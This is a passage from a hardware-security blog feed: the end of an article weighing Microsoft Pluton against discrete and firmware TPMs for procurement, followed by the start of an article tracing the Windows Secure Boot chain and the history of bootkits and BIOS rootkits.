&lt;p&gt;&lt;code&gt;Get-Tpm&lt;/code&gt; in PowerShell reports &lt;code&gt;ManufacturerIdTxt&lt;/code&gt;. The four-character ASCII manufacturer string distinguishes the realisation. &lt;code&gt;MSFT&lt;/code&gt; is Pluton; &lt;code&gt;INTC&lt;/code&gt; is Intel PTT; &lt;code&gt;AMD &lt;/code&gt; (with trailing space) is AMD fTPM; &lt;code&gt;IFX&lt;/code&gt;, &lt;code&gt;STM&lt;/code&gt;, and &lt;code&gt;NTC&lt;/code&gt; cover Infineon, STMicro, and Nuvoton discrete TPMs respectively. The prior article&apos;s section 9 [@prior-tpm-in-windows] documents the broader manufacturer-string discovery path. The new Pluton-specific check is the four-letter &lt;code&gt;MSFT&lt;/code&gt; value.&lt;/p&gt;

Open PowerShell as administrator and run:&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;Get-Tpm | Select-Object ManufacturerIdTxt, ManufacturerVersion, TpmPresent, TpmReady
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A &lt;code&gt;ManufacturerIdTxt&lt;/code&gt; of &lt;code&gt;MSFT&lt;/code&gt; indicates Microsoft Pluton. &lt;code&gt;INTC&lt;/code&gt; is Intel PTT (the firmware TPM in CSME). &lt;code&gt;AMD &lt;/code&gt; (with the trailing space) is AMD fTPM (the firmware TPM in the PSP). The same logic is captured in the JavaScript &lt;code&gt;&amp;lt;RunnableCode&amp;gt;&lt;/code&gt; mock in section 5 above. For richer detail, run &lt;code&gt;tpm.msc&lt;/code&gt; -- the Microsoft Management Console snap-in shows the full TPM identity.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;Q2 -- Is Pluton &lt;em&gt;enabled&lt;/em&gt;, not just &lt;em&gt;present&lt;/em&gt;?&lt;/h3&gt;
&lt;p&gt;This is the §6 soft-fuse trap. On AMD Ryzen 6000 / 7000 / 8000 silicon, &lt;code&gt;Get-Tpm&lt;/code&gt; returning &lt;code&gt;MSFT&lt;/code&gt; proves Pluton is &lt;em&gt;exposed&lt;/em&gt; as the TPM but does not, on its own, prove Pluton is &lt;em&gt;enabled&lt;/em&gt; in firmware (§6&apos;s Definition + Callout walk the PSP directory 0xB BIT36 mechanism Garrett 2022 documents [@garrett-2022-pluton-rev]). The procurement-relevant action is to audit BIOS-level Pluton (HSP) toggles and correlate &lt;code&gt;Get-Tpm&lt;/code&gt;&apos;s manufacturer string with &lt;code&gt;Get-PnpDevice&lt;/code&gt; / Device Manager before counting an AMD-Ryzen-6000-class device as Pluton-protected. On Lenovo AMD Ryzen 6000 ThinkPads specifically, the launch posture was Pluton present but disabled by default [@register-2022-pluton] -- so a 2022 ThinkPad inventory query that finds Ryzen 6000 silicon will not, on its own, tell the operator whether Pluton is doing any work.&lt;/p&gt;
&lt;h3&gt;Q3 -- Is Pluton firmware current?&lt;/h3&gt;
&lt;p&gt;Microsoft publishes Pluton firmware via Windows Update [@ms-learn-pluton]. Microsoft does not publish a per-release notes feed for Pluton firmware, so the operator must rely on the general Windows Update history and the chip vendor&apos;s advisory feed (Intel SA-* for Intel-Pluton silicon; AMD&apos;s security bulletins for AMD-Pluton silicon). The procurement-relevant property is that the channel exists and ships. The procurement-relevant &lt;em&gt;question&lt;/em&gt; is whether the operator&apos;s organisation is willing to depend on that channel.&lt;/p&gt;
&lt;h3&gt;Q4 -- When to &lt;em&gt;prefer&lt;/em&gt; Pluton over dTPM, PTT, or AMD fTPM&lt;/h3&gt;
&lt;p&gt;Three procurement scenarios where Pluton is the right answer in 2026.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Default Windows 11 client procurement.&lt;/strong&gt; Pluton on AMD Ryzen 6000 and later, Intel Core Ultra 200V Series and Series 3, and Snapdragon X Series [@ms-learn-pluton]. The Microsoft-supported configuration; the path of least administrative resistance; the only realisation that ships memory-safe firmware on the Patch Tuesday cadence.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Adversary model includes physical access.&lt;/strong&gt; Andzakovic-class bus sniffing [@andzakovic-2019-tpm-sniffing], faulTPM-class voltage glitching [@jacob-2023-faultpm]. Pluton (on-die, dedicated TEE) closes both surfaces structurally.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Need fast firmware updates for security responses to TCG-reference-code bugs.&lt;/strong&gt; CVE-2025-2884 is the worked example [@cve-2025-2884]. Pluton&apos;s Windows Update servicing is the only realisation in 2026 that does not depend on the OEM UEFI capsule path.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Q5 -- When to &lt;em&gt;not&lt;/em&gt; prefer it&lt;/h3&gt;
&lt;p&gt;Three procurement scenarios where Pluton is not the right answer.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Regulated fleets requiring a non-US trust anchor.&lt;/strong&gt; German BSI PP-0084-class procurement [@bsi-pp-0084], EU sovereign workloads. Hardened dTPM (Infineon SLB 9670 / 9672, STMicro ST33TPHF) has the certified posture [@bsi-slb-9670-cc]; Pluton has no public Common Criteria EAL4+ certification for the whole security processor as of 2026, though its ROM module carries a FIPS 140-3 Level 2 validation (CMVP cert 4880) [@bsi-slb-9670-cc].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Air-gapped fleets that cannot accept Windows-Update-delivered firmware.&lt;/strong&gt; Offline UEFI capsule servicing remains the only operationally feasible patch path; dTPM is the mechanically right choice for that fleet.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Multi-vendor sourcing requirements.&lt;/strong&gt; dTPM has multiple silicon vendors (Infineon, STMicro, Nuvoton). Pluton has one signer per chip and only the AMD / Intel / Qualcomm silicon paths Microsoft has licensed. Datacenter operators who need multi-vendor sourcing should look at Caliptra [@caliptra-github] -- not a Pluton substitute on Windows clients, but the right answer for datacenter SoC procurement.&lt;/li&gt;
&lt;/ul&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Choose Pluton when...&lt;/th&gt;
&lt;th&gt;Choose dTPM (or Caliptra) when...&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Default Windows 11 client procurement [@ms-learn-pluton]&lt;/td&gt;
&lt;td&gt;Sovereign procurement (German BSI, EU sovereign)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Adversary model includes physical access&lt;/td&gt;
&lt;td&gt;Air-gapped fleet, no Windows Update channel acceptable&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Need Patch Tuesday firmware response cadence&lt;/td&gt;
&lt;td&gt;Need EAL4+ / FIPS 140-3 certification posture today&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Want memory-safe Rust firmware (2024+ silicon)&lt;/td&gt;
&lt;td&gt;Need multi-vendor silicon sourcing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Want on-die dedicated TEE versus shared PSP/CSME&lt;/td&gt;
&lt;td&gt;Datacenter SoC integration (Caliptra)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart TD
    Start[Need a TPM/RoT in 2026?]
    Q1{Datacenter SoC?}
    Q2{Sovereign / non-US RoT required?}
    Q3{Air-gapped fleet?}
    Q4{Default Windows 11 enterprise?}
    Caliptra[Caliptra 1.0]
    DTPM[Hardened dTPM&lt;br /&gt;Infineon SLB 9670/9672&lt;br /&gt;or STMicro ST33TPHF]
    DTPMcap[Hardened dTPM&lt;br /&gt;offline UEFI capsule path]
    Pluton[Pluton on AMD Ryzen 6000+&lt;br /&gt;or Intel Core Ultra 200V+&lt;br /&gt;or Snapdragon X Series]
    Start --&amp;gt; Q1
    Q1 --&amp;gt;|Yes| Caliptra
    Q1 --&amp;gt;|No| Q2
    Q2 --&amp;gt;|Yes| DTPM
    Q2 --&amp;gt;|No| Q3
    Q3 --&amp;gt;|Yes| DTPMcap
    Q3 --&amp;gt;|No| Q4
    Q4 --&amp;gt;|Yes| Pluton
    Q4 --&amp;gt;|No| DTPM
&lt;p&gt;We started with the question Microsoft answered architecturally before the prior article posed it. Where does that leave the political question that even the architectural answer cannot resolve?&lt;/p&gt;
&lt;h2&gt;11. Frequently asked questions, and one more political question&lt;/h2&gt;
&lt;p&gt;The architectural answer to &quot;what is the cost of letting Microsoft sign the chip&apos;s firmware?&quot; is partial and has been answered by every section above. The remaining piece is a set of common misconceptions, then a closing tied to the prior article.&lt;/p&gt;

No. fTPM is a TPM 2.0 task running inside an existing TEE -- Intel CSME (PTT) or AMD PSP. Pluton is a *dedicated* IP block on the SoC die that does not share a TEE with anything else. The threat-model gap that faulTPM exposed [@jacob-2023-faultpm] only closes for Pluton-as-Pluton, not for fTPM running on Pluton-equipped silicon. AMD-Ryzen-6000-class chips can ship Pluton silicon next to the existing PSP-based fTPM; §5 documents the OEM-picks-one mechanism via the Pluton (HSP) BIOS toggle [@garrett-2022-pluton-rev], and faulTPM-class attacks remain valid only on systems the OEM exposes as fTPM.

No. Pluton implements the TCG TPM 2.0 specification plus Microsoft-specific extensions like SHACK [@ms-pluton-blog-2020]. From Windows&apos;s perspective, Pluton *is* a TPM, with a different update story (Windows Update versus OEM UEFI capsule) and a different trust anchor (Microsoft as firmware signer). Whether the OEM exposes Pluton &quot;as the TPM&quot; or alongside a discrete TPM is an OEM choice [@ms-learn-pluton-as-tpm]: *&quot;Microsoft Pluton can be used as a TPM, or with a TPM. Although Pluton builds security directly into the CPU, device manufacturers might choose to use discrete TPM as the default TPM, while having Pluton available to the system as a security processor for use cases beyond the TPM&quot;* [@ms-learn-pluton-as-tpm].

No. Pluton firmware is Microsoft-authored and Microsoft-signed [@ms-learn-pluton]. Caliptra is Microsoft-co-contributed and open source [@caliptra-github] -- but Caliptra is datacenter-class, not a Pluton substitute on Windows clients. The closest open-source on-die RoT for clients is OpenTitan [@opentitan-home] [@opentitan-commercial], which as of 2026 is discrete or in-package, not on-die in an application SoC. Tock OS [@tock-github] is the most mature publicly reviewed memory-safe embedded RTOS that *could* host Pluton-class workloads; whether it is the actual runtime on Pluton-on-PC is not on the public record.

No. Pluton centralises firmware *signing*, not key access. The November 17, 2020 announcement specifies SHACK -- Secure Hardware Cryptography Key -- which states that keys *&quot;are never exposed outside of the protected hardware, even to the Pluton firmware itself&quot;* [@ms-pluton-blog-2020]. Microsoft signs the firmware that runs on Pluton; the keys Pluton creates and seals stay inside Pluton. (The prior article&apos;s FAQ entry on this point [@prior-tpm-in-windows] makes the same observation about the underlying TPM 2.0 non-exportability property.)

Three things, in order. First, no off-package bus to sniff -- Andzakovic-class attacks [@andzakovic-2019-tpm-sniffing] have nothing to attack on Pluton silicon. Second, Patch Tuesday-cadence firmware fixes for TCG-reference-code bugs -- CVE-2025-2884 [@cve-2025-2884] is the worked example; the Pluton Windows Update path collapses the dwell time that a discrete-TPM fix would otherwise spend in OEM UEFI capsule queues. Third, Microsoft-authored Rust firmware on 2024+ AMD and Intel silicon [@ms-learn-pluton]; the bug class that memory-safe firmware structurally rules out is large. The cost of all three is a Microsoft signing key as the chip&apos;s trust anchor.

Pluton inherits the TCG TPM 2.0 algorithm-agility property the prior article documented in section 8.1 [@prior-tpm-in-windows]. Caliptra 2.0 has a stated commitment to ML-DSA and ML-KEM [@caliptra-github]; Pluton-firmware post-quantum migration tracks similar primitives, but no Microsoft public commitment to a specific date for a post-quantum Pluton firmware release exists in 2026. The point of the algorithm-agility property is that the migration is a firmware change, not a silicon respin -- which is precisely the property the Pluton update path is designed to operationalise.

Generally no. Disabling Pluton on AMD Ryzen 6000+ via the BIOS toggle does not return the system to a *stronger* security posture; it returns it to AMD fTPM (or no TPM at all, depending on the OEM&apos;s BIOS design). The faulTPM-class attack surface that motivated the move to Pluton in the first place re-opens [@jacob-2023-faultpm]. The procurement scenarios in section 10 list the narrow cases where dTPM is the right answer; in those cases the right action is to procure dTPM-equipped silicon, not to disable Pluton on Pluton-equipped silicon.
&lt;h3&gt;A closing tied to the prior article&lt;/h3&gt;
&lt;p&gt;Return to the line that opened this article. &lt;em&gt;&quot;The TPM was supposed to be the part of the system you didn&apos;t have to trust anyone for. Twenty-five years later, the trust question is back -- and the answer is now political&quot;&lt;/em&gt; [@prior-tpm-in-windows]. The architectural answer to that question existed inside an Xbox before the question was asked. Twelve years of Microsoft security silicon -- Xbox One in 2013, Project Sopris in 2015, the &lt;em&gt;Seven Properties&lt;/em&gt; paper in 2017, Project Cerberus in 2017, Azure Sphere in 2018, Pluton-on-PC in 2020, AMD Ryzen 6000 silicon in 2022, Linux 6.3 driver in 2023, Caliptra 1.0 in 2024, the CVE-2025-2884 dwell-time test in 2025 -- have shaped the on-die security processor on the modern Windows 11 client.&lt;/p&gt;
&lt;p&gt;The article&apos;s own answer is direct. Pluton makes the political question concrete and unavoidable, but it does not resolve it. On-die closes the bus surface. Dedicated TEE closes the shared-TEE blast radius that defeated AMD fTPM. Memory-safe Rust firmware narrows the bug class that has driven the firmware-CVE economy for a decade. Windows Update collapses the patch latency from OEM-capsule quarters to Patch Tuesday weeks. &lt;em&gt;Each design choice retires a 2014-2024 attack class. Each design choice places a new trust in Microsoft.&lt;/em&gt; The trust question is now visible at every level of the stack: silicon supply chain, firmware language, signing key, update channel, regulatory jurisdiction. It does not go away because Microsoft engineered the chip well. It goes from being a technical question to being a procurement question.&lt;/p&gt;

Pluton makes the political question concrete and unavoidable, but it does not resolve it.
&lt;p&gt;The closing image is operational. An engineer running &lt;code&gt;Get-Tpm&lt;/code&gt; on a Windows 11 laptop in 2026 reads a four-letter token in the manufacturer string. &lt;code&gt;MSFT&lt;/code&gt; is what twelve years of Microsoft security silicon buys you. It is what closed the bus surface that the prior article&apos;s $40 FPGA exploited. It is what closed the shared-TEE surface that faulTPM extracted state from. It is what gives the Patch Tuesday channel something to deliver. It is also what places a single Microsoft signing key as the trust anchor for every Pluton-equipped Windows 11 client. That four-letter token is the article&apos;s subject, the prior article&apos;s epilogue, and the next decade&apos;s procurement question.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;microsoft-pluton-continuation&quot; keyTerms={[
  { term: &quot;Pluton&quot;, definition: &quot;Microsoft-designed on-die security processor; named publicly first in April 2018 (Azure Sphere); shipped on Windows-PC SoCs from November 17, 2020 (announcement) and CES 2022 (AMD Ryzen 6000 first silicon). Implements TCG TPM 2.0 plus Microsoft-specific extensions including SHACK.&quot; },
  { term: &quot;On-die Root of Trust (RoT)&quot;, definition: &quot;A hardware Root of Trust integrated as an IP block on the same silicon die as the application processor, with no off-package bus between the CPU and the RoT. Eliminates the bus-sniffing attack surface that defeats discrete TPMs.&quot; },
  { term: &quot;SHACK (Secure Hardware Cryptography Key)&quot;, definition: &quot;Pluton property named in the November 17, 2020 announcement: keys are &apos;never exposed outside of the protected hardware, even to the Pluton firmware itself.&apos; Extends the TCG TPM 2.0 non-exportability boundary inward by one ring.&quot; },
  { term: &quot;Soft-fuse Pluton disable (PSP directory 0xB BIT36)&quot;, definition: &quot;On AMD Ryzen 6000+ platforms, an OEM-controlled bit in the PSP directory that instructs the PSP to silence Pluton without a hardware power-down. Inventory queries that report &apos;Pluton present&apos; may not distinguish enabled from soft-disabled.&quot; },
  { term: &quot;Single-signer revocation impossibility&quot;, definition: &quot;If an on-die RoT firmware can only be authenticated by a single signer S, the chip&apos;s trust anchor cannot be retired without bricking the chip&apos;s firmware-update path, regardless of whether S is compromised, coerced, or jurisdictionally constrained. A key-management impossibility, not a cryptographic one.&quot; },
  { term: &quot;Caliptra&quot;, definition: &quot;Open-source datacenter-class on-die Root of Trust IP, hosted at CHIPS Alliance and co-contributed by Microsoft, Google, AMD, and NVIDIA. Reached 1.0 in April 2024. Multi-vendor by deployment; single-signer per chip.&quot; },
  { term: &quot;OpenTitan&quot;, definition: &quot;Open-source silicon Root of Trust descendant of Google Titan M; commercially available February 13, 2024 with nine coalition members hosted by lowRISC. RISC-V Ibex core with hardware AES, HMAC, KMAC, and OTBN engines.&quot; },
  { term: &quot;SPDM 1.3&quot;, definition: &quot;DMTF DSP0274 wire protocol for component attestation. Caliptra 2.0 commits to it on the server side; the PC-client equivalent is not yet shipping.&quot; },
  { term: &quot;Tock OS&quot;, definition: &quot;Memory-safe Rust embedded operating system for Cortex-M and RISC-V platforms. The most mature publicly reviewed Rust embedded RTOS; whether it is the actual runtime on Pluton-on-PC is not on the public record.&quot; },
  { term: &quot;Seven Properties of Highly Secure Devices&quot;, definition: &quot;Hunt, Letey, Nightingale 2017 framework (MSR-TR-2017-16): hardware-based root of trust, small TCB, defense in depth, compartmentalisation, certificate-based authentication, renewable security via online updates, and failure reporting. Property #6 is the property that distinguishes Pluton-on-PC from a 2014 dTPM.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>pluton</category><category>tpm</category><category>windows-security</category><category>hardware-security</category><category>caliptra</category><category>on-die-rot</category><category>firmware-security</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Secure Boot in Windows: The Chain From Sector Zero to Userinit, and Every Place It Has Broken</title><link>https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/</link><guid isPermaLink="true">https://paragmali.com/blog/secure-boot-in-windows-the-chain-from-sector-zero-to-userini/</guid><description>How Windows verifies and measures itself from CPU reset to logon, every rung of the boot chain, every public break, and what Pluton is being built to fix.</description><pubDate>Sat, 09 May 2026 00:00:00 GMT</pubDate><content:encoded>
Windows boots through a chain of verifications and measurements that runs from CPU reset to your desktop. UEFI Secure Boot signs the boot manager; Trusted Boot extends the signature check to every kernel-mode component; Measured Boot extends a parallel hash of every step into the TPM&apos;s PCR 0-7 and PCR 11, with DRTM later seeding PCR 17-22 from a CPU-vendor-signed late-launch anchor. After fifteen years of BIOS rootkits, MBR bootkits, and ESP-resident bootkits, that chain holds -- but every public Secure Boot break since 2022 (BlackLotus, Bitpixie, Bootkitty, LogoFAIL) has exploited the same gap: between patching a vulnerable Microsoft-signed binary and revoking it in dbx. Pluton-rooted firmware on Microsoft&apos;s update cadence is the planned escape.
&lt;h2&gt;1. Eight seconds in 2010, and everything that could already be wrong&lt;/h2&gt;
&lt;p&gt;Picture a small business owner in December 2010. She unplugs her three-year-old Dell, drives it home, and powers it on. The fan spins. The BIOS chimes. The Windows 7 logo appears. By the time she types her password and the desktop loads, eight seconds have passed.&lt;/p&gt;
&lt;p&gt;In those eight seconds, a TDL-4 bootkit that has been on disk for two weeks has already done its work. The infected master boot record patched the operating system loader in memory before the kernel finished initialising. Driver Signature Enforcement, the policy that was supposed to keep unsigned kernel drivers out, was disabled before the kernel checked for it. A ring-0 rootkit is now staged inside &lt;code&gt;ntoskrnl.exe&lt;/code&gt;. Kaspersky&apos;s June 2011 analysis counted 4,524,488 infected machines in the first three months of 2011 alone [@kaspersky-tdl4]. The owner notices nothing. By the time she authenticates, the operating system that authenticates her is loading code the operating system never agreed to load.&lt;/p&gt;
&lt;p&gt;The structural question raised by that scene is the question this article exists to answer: &lt;em&gt;what would it take for Windows to know, by the time the user types a password, that the machine has not been tampered with since power-on?&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The answer Microsoft began designing in 2011-2012 is a chain. UEFI Platform Initialization brings up the firmware. UEFI Secure Boot verifies the boot manager. Trusted Boot extends the signature check through &lt;code&gt;winload.efi&lt;/code&gt;, the kernel, and every boot-start driver. Early Launch Anti-Malware classifies subsequent drivers. The Secure Kernel comes up in a hardware-isolated execution mode. Through every one of those rungs, a parallel rail -- Measured Boot -- extends a hash of each component into the TPM&apos;s Platform Configuration Registers and records a separate, replayable event log, so that what was loaded can be proven later, even if the verifier itself was bypassed.&lt;/p&gt;
&lt;p&gt;That chain is the spine of this article. We will walk it rung by rung. We will see where it has been broken in the wild. And we will see why every successful break since 2022 has exploited the same operational invariant -- the gap between &lt;em&gt;patched&lt;/em&gt; and &lt;em&gt;revoked&lt;/em&gt; -- rather than any flaw in the cryptography.&lt;/p&gt;

flowchart TD
    SEC[&quot;SEC -- CPU reset, immutable ROM&quot;] --&amp;gt; PEI[&quot;PEI -- platform init&quot;]
    PEI --&amp;gt; DXE[&quot;DXE -- Secure Boot verifier lives here&quot;]
    DXE --&amp;gt; BDS[&quot;BDS -- pick boot variable&quot;]
    BDS --&amp;gt; BMGR[&quot;bootmgfw.efi (Microsoft-signed)&quot;]
    BMGR --&amp;gt; WLOAD[&quot;winload.efi (Microsoft-signed)&quot;]
    WLOAD --&amp;gt; NT[&quot;ntoskrnl.exe + boot-start drivers&quot;]
    NT --&amp;gt; ELAM[&quot;ELAM (Defender, signed AM)&quot;]
    NT --&amp;gt; SK[&quot;securekernel.exe (VTL1) + Trustlets&quot;]
    ELAM --&amp;gt; SMSS[&quot;smss.exe -&amp;gt; wininit -&amp;gt; winlogon&quot;]
    SK --&amp;gt; SMSS
    SMSS --&amp;gt; USR[&quot;userinit.exe -&amp;gt; explorer.exe&quot;]
    TPM[(&quot;TPM PCR 0-7, PCR 11&quot;)]
    DXE -. extend .-&amp;gt; TPM
    BMGR -. extend .-&amp;gt; TPM
    WLOAD -. extend .-&amp;gt; TPM
    NT -. extend .-&amp;gt; TPM
    ELAM -. extend .-&amp;gt; TPM
&lt;p&gt;Before there was a chain to walk, there was no chain at all.&lt;/p&gt;
&lt;h2&gt;2. Before Secure Boot: sector zero and the fiction of OS-level security&lt;/h2&gt;
&lt;p&gt;Ask what was actually verified during a 2011 PC boot, and the answer is: one byte pair. The &lt;code&gt;0x55AA&lt;/code&gt; magic at the end of the 512-byte master boot record. That is a format check, not an authenticity check. The 16-bit BIOS power-on self test loaded sector zero of the boot device into memory at &lt;code&gt;0000:7C00&lt;/code&gt; and jumped [@wp-mbr]. No signature. No measurement. Whatever was at sector zero, ran.&lt;/p&gt;
&lt;p&gt;That architectural fact had been the structural lesson of computer-security history for a quarter century. Stoned, the boot sector virus written by an unknown student in Wellington, New Zealand in 1987, demonstrated it without malicious intent: the virus was a prank that displayed &quot;Your PC is now Stoned!&quot; and propagated by writing itself to the boot sector of every disk a victim machine touched [@wp-stoned]. Brain (Pakistan, 1986) [@wp-brain] and Michelangelo (1991) [@wp-michelangelo] were the same lesson at scale. The lesson was not that those particular authors were dangerous. It was that any code reaching sector zero ran with implicit privilege.&lt;/p&gt;

A class of malware that survives operating-system reinstallation and antivirus scanning by infecting code that runs *before* the operating system loads -- traditionally the master boot record or the partition&apos;s volume boot record, more recently the EFI System Partition or the firmware itself. A bootkit&apos;s defining property is that the operating system it boots is one the bootkit itself chooses to load.
&lt;p&gt;The modern bootkit family arrived in 2005 and ran undefended for the next seven years. Derek Soeder and Ryan Permeh of eEye published &lt;em&gt;BootRoot&lt;/em&gt; at Black Hat USA 2005 [@bhusa05-bootroot], a proof of concept that hooked the BIOS interrupt 13h disk-read service before any operating system loaded and intercepted Windows kernel images on the way to memory. Vbootkit (Vipin and Nitin Kumar) followed in 2007, demonstrating the same primitive on Vista [@vbootkit-archive]. Mebroot (the malware family Sinowal/Torpig used) compiled in November 2007 according to early infection telemetry, weaponised the technique against actual victim populations [@wp-mebroot]. By 2011, TDL-3 and TDL-4 had pushed the lineage into the millions of infected hosts [@kaspersky-tdl4].&lt;/p&gt;
&lt;p&gt;The category took its final structural step on 13 September 2011, when Marco Giuliani at Webroot&apos;s threat lab disclosed &lt;em&gt;Mebromi&lt;/em&gt;, the first BIOS rootkit found in the wild. Mebromi targeted Award BIOS firmware. It used the legitimate Phoenix &lt;code&gt;CBROM.EXE&lt;/code&gt; utility -- a tool the BIOS vendor itself shipped for assembling firmware images -- to splice malicious code into the firmware ROM image, then used the platform&apos;s BIOS flashing routine to write the modified ROM back to the chip. On every subsequent boot, the firmware itself reinstalled the rootkit&apos;s MBR before any operating system existed to scan for it.The Mebromi reuse of the legitimate &lt;code&gt;CBROM.EXE&lt;/code&gt; firmware-assembly utility is the canonical illustration of the architectural problem. The defender&apos;s tools and the attacker&apos;s tools were the same tools. The firmware-update path had no signature, no measurement, and no policy gate; CBROM was just an executable that knew the Award ROM image format. The fix was not better antivirus. The fix was a hardware root that the OS itself could not rewrite.&lt;/p&gt;
&lt;p&gt;The structural argument that Mebromi made unanswerable: there was no measurement endpoint and no signature verifier &lt;em&gt;anywhere below&lt;/em&gt; the operating system. Every operating-system-level defence was rhetorical against this layer. Kernel-Mode Code Signing, the policy Windows Vista x64 had introduced in 2006 [@app-identity-sibling], was enforced by code that the bootkit could rewrite before the kernel started checking. Driver Signature Enforcement was a setting the operating system wrote into a memory location the operating system could not yet defend.&lt;/p&gt;
&lt;p&gt;Trust must be rooted in something the operating system cannot rewrite. That means the chain has to start before the operating system exists. The next rung is firmware itself.&lt;/p&gt;
&lt;h2&gt;3. UEFI Platform Initialization: SEC, PEI, DXE, BDS, and where Secure Boot actually lives&lt;/h2&gt;
&lt;p&gt;If Secure Boot starts at the operating-system loader, which exact piece of firmware decides whether the operating-system loader is allowed to run, and what verifies &lt;em&gt;that&lt;/em&gt; piece? The answer is a four-phase pipeline that almost no Windows engineer ever writes about. It is also where every modern firmware attack lands.&lt;/p&gt;

The Unified Extensible Firmware Interface Platform Initialization specification defines the internal architecture firmware uses to bring a system up. It splits boot into four phases: Security (SEC), Pre-EFI Initialization (PEI), Driver Execution Environment (DXE), and Boot Device Selection (BDS). Standard Windows usage of &quot;UEFI&quot; almost always means the externally-visible behaviour exposed by BDS and the EFI runtime services, not the multi-phase internal pipeline the firmware uses to get there.
&lt;p&gt;The four phases, per the TianoCore reference flow [@tianocore-pi-flow]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;SEC.&lt;/strong&gt; The Security phase begins at processor reset. Code runs from immutable on-die ROM or a locked region of SPI flash before main memory is even initialised. SEC&apos;s job is to establish the root of trust in the firmware -- before any flexible code path can be taken, the firmware has committed to an instruction stream the operating system cannot influence.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;PEI.&lt;/strong&gt; Pre-EFI Initialization brings up DRAM, configures the memory controller, populates Hand-Off Blocks (HOBs) the later phases consume, and dispatches the small drivers needed to reach a state where general firmware code can run. SEC and PEI together are the part of firmware that fits in the few hundred kilobytes of cache-as-RAM the CPU offers before main memory is up.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;DXE.&lt;/strong&gt; The Driver Execution Environment hosts most of what we think of as firmware: the disk drivers, the network stack, the human-interface drivers, the USB stack, and Secure Boot&apos;s image verifier. &lt;em&gt;This is where &lt;code&gt;LoadImage()&lt;/code&gt; runs db/dbx checks against incoming PE/COFF binaries.&lt;/em&gt; DXE phase code is several megabytes on a modern x86 platform.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;BDS.&lt;/strong&gt; Boot Device Selection reads the &lt;code&gt;BootOrder&lt;/code&gt; UEFI variable, picks a boot entry, hands the platform off to the operating system loader, and -- in normal operation -- never runs again until the next reboot.&lt;/li&gt;
&lt;/ul&gt;

flowchart LR
    BG[&quot;Boot Guard / AMD PSB&lt;br /&gt;(microcode, OTP fuses)&quot;] --&amp;gt; SEC[&quot;SEC&lt;br /&gt;immutable ROM&quot;]
    SEC --&amp;gt; PEI[&quot;PEI&lt;br /&gt;DRAM init&quot;]
    PEI --&amp;gt; DXE[&quot;DXE&lt;br /&gt;Secure Boot LoadImage()&quot;]
    DXE --&amp;gt; BDS[&quot;BDS&lt;br /&gt;read BootOrder&quot;]
    BDS --&amp;gt; OS[&quot;bootmgfw.efi&quot;]
&lt;p&gt;There is one rung &lt;em&gt;below&lt;/em&gt; SEC. Intel Boot Guard verifies the firmware via a CPU-microcode-loaded Authenticated Code Module signed by Intel [@wp-txt]; AMD Platform Secure Boot performs the same role from the AMD Platform Security Processor (PSP), an ARM-based co-processor embedded on the SoC [@ioactive-psb, @wp-amd-psp]. Both run before SEC can begin. Intel introduced Boot Guard on platforms based on the Haswell processor family (4th-generation Core, Lynx Point PCH) in 2013 [@eset-lojax, @wp-txt]; the actual root-of-trust fuses live in the PCH (on Haswell through Skylake-era platforms; from Ice Lake (2019+) onward, Intel placed the fuses on the CPU die itself) [@eset-lojax], and the OEM commits the verification key at provisioning, so Boot Guard support is a chipset-and-OEM property rather than a bare CPU-model property [@eset-lojax, @ioactive-psb]. AMD&apos;s PSB followed on EPYC server parts and was rolled out to Ryzen Pro platforms over the next several years; the PSP itself has been present on AMD client and server parts since around 2013 [@wp-amd-psp], but PSB is a distinct firmware-signing flow that uses it [@ioactive-psb].The Windows Hardware Compatibility Program codified UEFI 2.3.1 as the firmware floor for Windows 10 security features [@ms-oem-uefi]. Anything below 2.3.1 cannot host a Secure Boot configuration that Microsoft will certify. The keys that anchor those verifications are burned into one-time-programmable fuses inside the package, so the OEM commits to a public key when the part ships and cannot rotate it later [@eset-lojax, @ioactive-psb]. ESET&apos;s 2018 LoJax disclosure recommended Boot Guard explicitly: &quot;if possible, have a processor with a hardware root of trust as is the case with Intel processors supporting Intel Boot Guard (from the Haswell family of Intel processors onwards)&quot; [@eset-lojax].Boot Guard&apos;s OTP fuses are the canonical example of why hardware-rooted verification cannot have a software-only escape hatch [@eset-lojax, @ioactive-psb]. If the OEM&apos;s signing key leaks, the fuses cannot be reprogrammed in the field; an attacker with the leaked key can produce firmware that the silicon will accept. This is the structural argument behind moving the root one more rung down -- into Pluton, where Microsoft, not the OEM, owns the update cadence.&lt;/p&gt;
